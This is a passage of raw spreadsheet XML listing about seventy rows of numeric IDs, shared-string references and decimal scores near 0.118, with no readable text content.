    <row r="12187" ht="15.75" customHeight="1">
      <c r="A12187" s="1">
        <v>1319.0</v>
      </c>
      <c r="B12187" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C12187" s="2" t="s">
        <v>11706</v>
      </c>
      <c r="D12187" s="2">
        <v>1.0</v>
      </c>
      <c r="E12187" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12187" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="12188" ht="15.75" customHeight="1">
      <c r="A12188" s="1">
        <v>5247.0</v>
      </c>
      <c r="B12188" s="2">
        <v>4.5067275E7</v>
      </c>
      <c r="C12188" s="2" t="s">
        <v>11707</v>
      </c>
      <c r="D12188" s="2">
        <v>1.0</v>
      </c>
      <c r="E12188" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12188" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="12189" ht="15.75" customHeight="1">
      <c r="A12189" s="1">
        <v>14468.0</v>
      </c>
      <c r="B12189" s="2">
        <v>3.9501519E7</v>
      </c>
      <c r="C12189" s="2" t="s">
        <v>11708</v>
      </c>
      <c r="D12189" s="2">
        <v>1.0</v>
      </c>
      <c r="E12189" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12189" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="12190" ht="15.75" customHeight="1">
      <c r="A12190" s="1">
        <v>15435.0</v>
      </c>
      <c r="B12190" s="2">
        <v>4.2972451E7</v>
      </c>
      <c r="C12190" s="2" t="s">
        <v>11709</v>
      </c>
      <c r="D12190" s="2">
        <v>1.0</v>
      </c>
      <c r="E12190" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12190" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="12191" ht="15.75" customHeight="1">
      <c r="A12191" s="1">
        <v>20464.0</v>
      </c>
      <c r="B12191" s="2">
        <v>1.2700474E7</v>
      </c>
      <c r="C12191" s="2" t="s">
        <v>11710</v>
      </c>
      <c r="D12191" s="2">
        <v>1.0</v>
      </c>
      <c r="E12191" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12191" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="12192" ht="15.75" customHeight="1">
      <c r="A12192" s="1">
        <v>24862.0</v>
      </c>
      <c r="B12192" s="2">
        <v>1.2208325E7</v>
      </c>
      <c r="C12192" s="2" t="s">
        <v>11711</v>
      </c>
      <c r="D12192" s="2">
        <v>1.0</v>
      </c>
      <c r="E12192" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12192" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="12193" ht="15.75" customHeight="1">
      <c r="A12193" s="1">
        <v>27541.0</v>
      </c>
      <c r="B12193" s="2">
        <v>2.2305971E7</v>
      </c>
      <c r="C12193" s="2" t="s">
        <v>11712</v>
      </c>
      <c r="D12193" s="2">
        <v>1.0</v>
      </c>
      <c r="E12193" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12193" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="12194" ht="15.75" customHeight="1">
      <c r="A12194" s="1">
        <v>31344.0</v>
      </c>
      <c r="B12194" s="2">
        <v>4983515.0</v>
      </c>
      <c r="C12194" s="2" t="s">
        <v>11713</v>
      </c>
      <c r="D12194" s="2">
        <v>1.0</v>
      </c>
      <c r="E12194" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12194" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="12195" ht="15.75" customHeight="1">
      <c r="A12195" s="1">
        <v>6917.0</v>
      </c>
      <c r="B12195" s="2">
        <v>4.9866779E7</v>
      </c>
      <c r="C12195" s="2" t="s">
        <v>11714</v>
      </c>
      <c r="D12195" s="2">
        <v>1.0</v>
      </c>
      <c r="E12195" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12195" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12196" ht="15.75" customHeight="1">
      <c r="A12196" s="1">
        <v>7340.0</v>
      </c>
      <c r="B12196" s="2">
        <v>5.0966078E7</v>
      </c>
      <c r="C12196" s="2" t="s">
        <v>11715</v>
      </c>
      <c r="D12196" s="2">
        <v>1.0</v>
      </c>
      <c r="E12196" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12196" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12197" ht="15.75" customHeight="1">
      <c r="A12197" s="1">
        <v>7389.0</v>
      </c>
      <c r="B12197" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C12197" s="2" t="s">
        <v>11716</v>
      </c>
      <c r="D12197" s="2">
        <v>1.0</v>
      </c>
      <c r="E12197" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12197" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12198" ht="15.75" customHeight="1">
      <c r="A12198" s="1">
        <v>11606.0</v>
      </c>
      <c r="B12198" s="2">
        <v>2.3039864E7</v>
      </c>
      <c r="C12198" s="2" t="s">
        <v>11717</v>
      </c>
      <c r="D12198" s="2">
        <v>1.0</v>
      </c>
      <c r="E12198" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12198" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12199" ht="15.75" customHeight="1">
      <c r="A12199" s="1">
        <v>14258.0</v>
      </c>
      <c r="B12199" s="2">
        <v>3.8390159E7</v>
      </c>
      <c r="C12199" s="5" t="s">
        <v>11718</v>
      </c>
      <c r="D12199" s="2">
        <v>1.0</v>
      </c>
      <c r="E12199" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12199" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12200" ht="15.75" customHeight="1">
      <c r="A12200" s="1">
        <v>14343.0</v>
      </c>
      <c r="B12200" s="2">
        <v>3.8845395E7</v>
      </c>
      <c r="C12200" s="2" t="s">
        <v>11719</v>
      </c>
      <c r="D12200" s="2">
        <v>1.0</v>
      </c>
      <c r="E12200" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12200" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12201" ht="15.75" customHeight="1">
      <c r="A12201" s="1">
        <v>14874.0</v>
      </c>
      <c r="B12201" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C12201" s="2" t="s">
        <v>11720</v>
      </c>
      <c r="D12201" s="2">
        <v>1.0</v>
      </c>
      <c r="E12201" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12201" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12202" ht="15.75" customHeight="1">
      <c r="A12202" s="1">
        <v>15765.0</v>
      </c>
      <c r="B12202" s="2">
        <v>4.4179143E7</v>
      </c>
      <c r="C12202" s="2" t="s">
        <v>11721</v>
      </c>
      <c r="D12202" s="2">
        <v>1.0</v>
      </c>
      <c r="E12202" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12202" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12203" ht="15.75" customHeight="1">
      <c r="A12203" s="1">
        <v>16188.0</v>
      </c>
      <c r="B12203" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C12203" s="2" t="s">
        <v>11722</v>
      </c>
      <c r="D12203" s="2">
        <v>1.0</v>
      </c>
      <c r="E12203" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12203" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12204" ht="15.75" customHeight="1">
      <c r="A12204" s="1">
        <v>17999.0</v>
      </c>
      <c r="B12204" s="2">
        <v>5.1416828E7</v>
      </c>
      <c r="C12204" s="2" t="s">
        <v>11723</v>
      </c>
      <c r="D12204" s="2">
        <v>1.0</v>
      </c>
      <c r="E12204" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12204" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12205" ht="15.75" customHeight="1">
      <c r="A12205" s="1">
        <v>22592.0</v>
      </c>
      <c r="B12205" s="2">
        <v>3.9275378E7</v>
      </c>
      <c r="C12205" s="2" t="s">
        <v>11724</v>
      </c>
      <c r="D12205" s="2">
        <v>1.0</v>
      </c>
      <c r="E12205" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12205" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12206" ht="15.75" customHeight="1">
      <c r="A12206" s="1">
        <v>25097.0</v>
      </c>
      <c r="B12206" s="2">
        <v>1.2930241E7</v>
      </c>
      <c r="C12206" s="2" t="s">
        <v>11725</v>
      </c>
      <c r="D12206" s="2">
        <v>1.0</v>
      </c>
      <c r="E12206" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12206" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12207" ht="15.75" customHeight="1">
      <c r="A12207" s="1">
        <v>30447.0</v>
      </c>
      <c r="B12207" s="2">
        <v>3.9275377E7</v>
      </c>
      <c r="C12207" s="2" t="s">
        <v>11726</v>
      </c>
      <c r="D12207" s="2">
        <v>1.0</v>
      </c>
      <c r="E12207" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12207" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12208" ht="15.75" customHeight="1">
      <c r="A12208" s="1">
        <v>33956.0</v>
      </c>
      <c r="B12208" s="2">
        <v>9306583.0</v>
      </c>
      <c r="C12208" s="2" t="s">
        <v>11727</v>
      </c>
      <c r="D12208" s="2">
        <v>1.0</v>
      </c>
      <c r="E12208" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12208" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="12209" ht="15.75" customHeight="1">
      <c r="A12209" s="1">
        <v>15715.0</v>
      </c>
      <c r="B12209" s="2">
        <v>4.3969904E7</v>
      </c>
      <c r="C12209" s="2" t="s">
        <v>11728</v>
      </c>
      <c r="D12209" s="2">
        <v>1.0</v>
      </c>
      <c r="E12209" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12209" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="12210" ht="15.75" customHeight="1">
      <c r="A12210" s="1">
        <v>12537.0</v>
      </c>
      <c r="B12210" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C12210" s="2" t="s">
        <v>11729</v>
      </c>
      <c r="D12210" s="2">
        <v>1.0</v>
      </c>
      <c r="E12210" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12210" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="12211" ht="15.75" customHeight="1">
      <c r="A12211" s="1">
        <v>33753.0</v>
      </c>
      <c r="B12211" s="2">
        <v>8594239.0</v>
      </c>
      <c r="C12211" s="2" t="s">
        <v>11730</v>
      </c>
      <c r="D12211" s="2">
        <v>1.0</v>
      </c>
      <c r="E12211" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12211" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="12212" ht="15.75" customHeight="1">
      <c r="A12212" s="1">
        <v>24687.0</v>
      </c>
      <c r="B12212" s="2">
        <v>1.162116E7</v>
      </c>
      <c r="C12212" s="2" t="s">
        <v>11731</v>
      </c>
      <c r="D12212" s="2">
        <v>1.0</v>
      </c>
      <c r="E12212" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12212" s="2">
        <v>0.1186868686868687</v>
      </c>
    </row>
    <row r="12213" ht="15.75" customHeight="1">
      <c r="A12213" s="1">
        <v>819.0</v>
      </c>
      <c r="B12213" s="2">
        <v>2.1464537E7</v>
      </c>
      <c r="C12213" s="2" t="s">
        <v>11732</v>
      </c>
      <c r="D12213" s="2">
        <v>1.0</v>
      </c>
      <c r="E12213" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12213" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12214" ht="15.75" customHeight="1">
      <c r="A12214" s="1">
        <v>2965.0</v>
      </c>
      <c r="B12214" s="2">
        <v>3.6073279E7</v>
      </c>
      <c r="C12214" s="2" t="s">
        <v>11733</v>
      </c>
      <c r="D12214" s="2">
        <v>1.0</v>
      </c>
      <c r="E12214" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12214" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12215" ht="15.75" customHeight="1">
      <c r="A12215" s="1">
        <v>3008.0</v>
      </c>
      <c r="B12215" s="2">
        <v>3.6338991E7</v>
      </c>
      <c r="C12215" s="2" t="s">
        <v>11734</v>
      </c>
      <c r="D12215" s="2">
        <v>1.0</v>
      </c>
      <c r="E12215" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12215" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12216" ht="15.75" customHeight="1">
      <c r="A12216" s="1">
        <v>3210.0</v>
      </c>
      <c r="B12216" s="2">
        <v>3.7284101E7</v>
      </c>
      <c r="C12216" s="2" t="s">
        <v>11735</v>
      </c>
      <c r="D12216" s="2">
        <v>1.0</v>
      </c>
      <c r="E12216" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12216" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12217" ht="15.75" customHeight="1">
      <c r="A12217" s="1">
        <v>3516.0</v>
      </c>
      <c r="B12217" s="2">
        <v>3.8594159E7</v>
      </c>
      <c r="C12217" s="2" t="s">
        <v>11736</v>
      </c>
      <c r="D12217" s="2">
        <v>1.0</v>
      </c>
      <c r="E12217" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12217" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12218" ht="15.75" customHeight="1">
      <c r="A12218" s="1">
        <v>4673.0</v>
      </c>
      <c r="B12218" s="2">
        <v>4.3149267E7</v>
      </c>
      <c r="C12218" s="2" t="s">
        <v>11737</v>
      </c>
      <c r="D12218" s="2">
        <v>1.0</v>
      </c>
      <c r="E12218" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12218" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12219" ht="15.75" customHeight="1">
      <c r="A12219" s="1">
        <v>5485.0</v>
      </c>
      <c r="B12219" s="2">
        <v>4.5764465E7</v>
      </c>
      <c r="C12219" s="2" t="s">
        <v>11738</v>
      </c>
      <c r="D12219" s="2">
        <v>1.0</v>
      </c>
      <c r="E12219" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12219" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12220" ht="15.75" customHeight="1">
      <c r="A12220" s="1">
        <v>5519.0</v>
      </c>
      <c r="B12220" s="2">
        <v>4.5856043E7</v>
      </c>
      <c r="C12220" s="2" t="s">
        <v>11739</v>
      </c>
      <c r="D12220" s="2">
        <v>1.0</v>
      </c>
      <c r="E12220" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12220" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12221" ht="15.75" customHeight="1">
      <c r="A12221" s="1">
        <v>5824.0</v>
      </c>
      <c r="B12221" s="2">
        <v>4.6885322E7</v>
      </c>
      <c r="C12221" s="2" t="s">
        <v>11740</v>
      </c>
      <c r="D12221" s="2">
        <v>1.0</v>
      </c>
      <c r="E12221" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12221" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12222" ht="15.75" customHeight="1">
      <c r="A12222" s="1">
        <v>6009.0</v>
      </c>
      <c r="B12222" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C12222" s="2" t="s">
        <v>11741</v>
      </c>
      <c r="D12222" s="2">
        <v>1.0</v>
      </c>
      <c r="E12222" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12222" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12223" ht="15.75" customHeight="1">
      <c r="A12223" s="1">
        <v>6022.0</v>
      </c>
      <c r="B12223" s="2">
        <v>4.7505943E7</v>
      </c>
      <c r="C12223" s="2" t="s">
        <v>11742</v>
      </c>
      <c r="D12223" s="2">
        <v>1.0</v>
      </c>
      <c r="E12223" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12223" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12224" ht="15.75" customHeight="1">
      <c r="A12224" s="1">
        <v>6279.0</v>
      </c>
      <c r="B12224" s="2">
        <v>4.8144472E7</v>
      </c>
      <c r="C12224" s="2" t="s">
        <v>11743</v>
      </c>
      <c r="D12224" s="2">
        <v>1.0</v>
      </c>
      <c r="E12224" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12224" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12225" ht="15.75" customHeight="1">
      <c r="A12225" s="1">
        <v>7207.0</v>
      </c>
      <c r="B12225" s="2">
        <v>5.0596052E7</v>
      </c>
      <c r="C12225" s="2" t="s">
        <v>11744</v>
      </c>
      <c r="D12225" s="2">
        <v>1.0</v>
      </c>
      <c r="E12225" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12225" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12226" ht="15.75" customHeight="1">
      <c r="A12226" s="1">
        <v>7825.0</v>
      </c>
      <c r="B12226" s="2">
        <v>5.2311677E7</v>
      </c>
      <c r="C12226" s="2" t="s">
        <v>11745</v>
      </c>
      <c r="D12226" s="2">
        <v>1.0</v>
      </c>
      <c r="E12226" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12226" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12227" ht="15.75" customHeight="1">
      <c r="A12227" s="1">
        <v>7827.0</v>
      </c>
      <c r="B12227" s="2">
        <v>5.2311677E7</v>
      </c>
      <c r="C12227" s="2" t="s">
        <v>11746</v>
      </c>
      <c r="D12227" s="2">
        <v>1.0</v>
      </c>
      <c r="E12227" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12227" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12228" ht="15.75" customHeight="1">
      <c r="A12228" s="1">
        <v>7871.0</v>
      </c>
      <c r="B12228" s="2">
        <v>5.2401092E7</v>
      </c>
      <c r="C12228" s="2" t="s">
        <v>11747</v>
      </c>
      <c r="D12228" s="2">
        <v>1.0</v>
      </c>
      <c r="E12228" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12228" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12229" ht="15.75" customHeight="1">
      <c r="A12229" s="1">
        <v>8393.0</v>
      </c>
      <c r="B12229" s="2">
        <v>5.3856019E7</v>
      </c>
      <c r="C12229" s="2" t="s">
        <v>11748</v>
      </c>
      <c r="D12229" s="2">
        <v>1.0</v>
      </c>
      <c r="E12229" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12229" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12230" ht="15.75" customHeight="1">
      <c r="A12230" s="1">
        <v>8591.0</v>
      </c>
      <c r="B12230" s="2">
        <v>5.4245181E7</v>
      </c>
      <c r="C12230" s="2" t="s">
        <v>11749</v>
      </c>
      <c r="D12230" s="2">
        <v>1.0</v>
      </c>
      <c r="E12230" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12230" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12231" ht="15.75" customHeight="1">
      <c r="A12231" s="1">
        <v>9047.0</v>
      </c>
      <c r="B12231" s="2">
        <v>5.506033E7</v>
      </c>
      <c r="C12231" s="2" t="s">
        <v>11750</v>
      </c>
      <c r="D12231" s="2">
        <v>1.0</v>
      </c>
      <c r="E12231" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12231" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12232" ht="15.75" customHeight="1">
      <c r="A12232" s="1">
        <v>9513.0</v>
      </c>
      <c r="B12232" s="2">
        <v>5.5965603E7</v>
      </c>
      <c r="C12232" s="2" t="s">
        <v>11751</v>
      </c>
      <c r="D12232" s="2">
        <v>1.0</v>
      </c>
      <c r="E12232" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12232" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12233" ht="15.75" customHeight="1">
      <c r="A12233" s="1">
        <v>10956.0</v>
      </c>
      <c r="B12233" s="2">
        <v>1.7147487E7</v>
      </c>
      <c r="C12233" s="2" t="s">
        <v>11752</v>
      </c>
      <c r="D12233" s="2">
        <v>1.0</v>
      </c>
      <c r="E12233" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12233" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12234" ht="15.75" customHeight="1">
      <c r="A12234" s="1">
        <v>13322.0</v>
      </c>
      <c r="B12234" s="2">
        <v>3.4601004E7</v>
      </c>
      <c r="C12234" s="5" t="s">
        <v>11753</v>
      </c>
      <c r="D12234" s="2">
        <v>1.0</v>
      </c>
      <c r="E12234" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12234" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12235" ht="15.75" customHeight="1">
      <c r="A12235" s="1">
        <v>14718.0</v>
      </c>
      <c r="B12235" s="2">
        <v>4.0633959E7</v>
      </c>
      <c r="C12235" s="2" t="s">
        <v>11754</v>
      </c>
      <c r="D12235" s="2">
        <v>1.0</v>
      </c>
      <c r="E12235" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12235" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12236" ht="15.75" customHeight="1">
      <c r="A12236" s="1">
        <v>17337.0</v>
      </c>
      <c r="B12236" s="2">
        <v>4.9392532E7</v>
      </c>
      <c r="C12236" s="2" t="s">
        <v>11755</v>
      </c>
      <c r="D12236" s="2">
        <v>1.0</v>
      </c>
      <c r="E12236" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12236" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12237" ht="15.75" customHeight="1">
      <c r="A12237" s="1">
        <v>17920.0</v>
      </c>
      <c r="B12237" s="2">
        <v>5.1158973E7</v>
      </c>
      <c r="C12237" s="5" t="s">
        <v>11756</v>
      </c>
      <c r="D12237" s="2">
        <v>1.0</v>
      </c>
      <c r="E12237" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12237" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12238" ht="15.75" customHeight="1">
      <c r="A12238" s="1">
        <v>17926.0</v>
      </c>
      <c r="B12238" s="2">
        <v>5.1166552E7</v>
      </c>
      <c r="C12238" s="2" t="s">
        <v>11757</v>
      </c>
      <c r="D12238" s="2">
        <v>1.0</v>
      </c>
      <c r="E12238" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12238" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12239" ht="15.75" customHeight="1">
      <c r="A12239" s="1">
        <v>18338.0</v>
      </c>
      <c r="B12239" s="2">
        <v>5.2421383E7</v>
      </c>
      <c r="C12239" s="2" t="s">
        <v>11758</v>
      </c>
      <c r="D12239" s="2">
        <v>1.0</v>
      </c>
      <c r="E12239" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12239" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12240" ht="15.75" customHeight="1">
      <c r="A12240" s="1">
        <v>19433.0</v>
      </c>
      <c r="B12240" s="2">
        <v>5.5702898E7</v>
      </c>
      <c r="C12240" s="2" t="s">
        <v>11759</v>
      </c>
      <c r="D12240" s="2">
        <v>1.0</v>
      </c>
      <c r="E12240" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12240" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12241" ht="15.75" customHeight="1">
      <c r="A12241" s="1">
        <v>23948.0</v>
      </c>
      <c r="B12241" s="2">
        <v>8890486.0</v>
      </c>
      <c r="C12241" s="2" t="s">
        <v>11760</v>
      </c>
      <c r="D12241" s="2">
        <v>1.0</v>
      </c>
      <c r="E12241" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12241" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12242" ht="15.75" customHeight="1">
      <c r="A12242" s="1">
        <v>28470.0</v>
      </c>
      <c r="B12242" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C12242" s="2" t="s">
        <v>11761</v>
      </c>
      <c r="D12242" s="2">
        <v>1.0</v>
      </c>
      <c r="E12242" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12242" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12243" ht="15.75" customHeight="1">
      <c r="A12243" s="1">
        <v>29250.0</v>
      </c>
      <c r="B12243" s="2">
        <v>3.0858431E7</v>
      </c>
      <c r="C12243" s="5" t="s">
        <v>11762</v>
      </c>
      <c r="D12243" s="2">
        <v>1.0</v>
      </c>
      <c r="E12243" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12243" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12244" ht="15.75" customHeight="1">
      <c r="A12244" s="1">
        <v>33814.0</v>
      </c>
      <c r="B12244" s="2">
        <v>8890485.0</v>
      </c>
      <c r="C12244" s="2" t="s">
        <v>11760</v>
      </c>
      <c r="D12244" s="2">
        <v>1.0</v>
      </c>
      <c r="E12244" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12244" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="12245" ht="15.75" customHeight="1">
      <c r="A12245" s="1">
        <v>7331.0</v>
      </c>
      <c r="B12245" s="2">
        <v>5.0924377E7</v>
      </c>
      <c r="C12245" s="2" t="s">
        <v>11763</v>
      </c>
      <c r="D12245" s="2">
        <v>1.0</v>
      </c>
      <c r="E12245" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12245" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="12246" ht="15.75" customHeight="1">
      <c r="A12246" s="1">
        <v>14000.0</v>
      </c>
      <c r="B12246" s="2">
        <v>3.7383518E7</v>
      </c>
      <c r="C12246" s="2" t="s">
        <v>11764</v>
      </c>
      <c r="D12246" s="2">
        <v>1.0</v>
      </c>
      <c r="E12246" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12246" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="12247" ht="15.75" customHeight="1">
      <c r="A12247" s="1">
        <v>16343.0</v>
      </c>
      <c r="B12247" s="2">
        <v>4.6074963E7</v>
      </c>
      <c r="C12247" s="2" t="s">
        <v>11765</v>
      </c>
      <c r="D12247" s="2">
        <v>1.0</v>
      </c>
      <c r="E12247" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12247" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="12248" ht="15.75" customHeight="1">
      <c r="A12248" s="1">
        <v>9864.0</v>
      </c>
      <c r="B12248" s="2">
        <v>5.6725053E7</v>
      </c>
      <c r="C12248" s="2" t="s">
        <v>11766</v>
      </c>
      <c r="D12248" s="2">
        <v>1.0</v>
      </c>
      <c r="E12248" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12248" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="12249" ht="15.75" customHeight="1">
      <c r="A12249" s="1">
        <v>24054.0</v>
      </c>
      <c r="B12249" s="2">
        <v>9575297.0</v>
      </c>
      <c r="C12249" s="2" t="s">
        <v>11767</v>
      </c>
      <c r="D12249" s="2">
        <v>1.0</v>
      </c>
      <c r="E12249" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12249" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="12250" ht="15.75" customHeight="1">
      <c r="A12250" s="1">
        <v>8862.0</v>
      </c>
      <c r="B12250" s="2">
        <v>5.4742613E7</v>
      </c>
      <c r="C12250" s="2" t="s">
        <v>11768</v>
      </c>
      <c r="D12250" s="2">
        <v>1.0</v>
      </c>
      <c r="E12250" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12250" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="12251" ht="15.75" customHeight="1">
      <c r="A12251" s="1">
        <v>19529.0</v>
      </c>
      <c r="B12251" s="2">
        <v>5.5977992E7</v>
      </c>
      <c r="C12251" s="2" t="s">
        <v>11769</v>
      </c>
      <c r="D12251" s="2">
        <v>1.0</v>
      </c>
      <c r="E12251" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12251" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="12252" ht="15.75" customHeight="1">
      <c r="A12252" s="1">
        <v>2201.0</v>
      </c>
      <c r="B12252" s="2">
        <v>3.2049379E7</v>
      </c>
      <c r="C12252" s="2" t="s">
        <v>11770</v>
      </c>
      <c r="D12252" s="2">
        <v>1.0</v>
      </c>
      <c r="E12252" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12252" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="12253" ht="15.75" customHeight="1">
      <c r="A12253" s="1">
        <v>9251.0</v>
      </c>
      <c r="B12253" s="2">
        <v>5.5473488E7</v>
      </c>
      <c r="C12253" s="2" t="s">
        <v>11771</v>
      </c>
      <c r="D12253" s="2">
        <v>1.0</v>
      </c>
      <c r="E12253" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12253" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
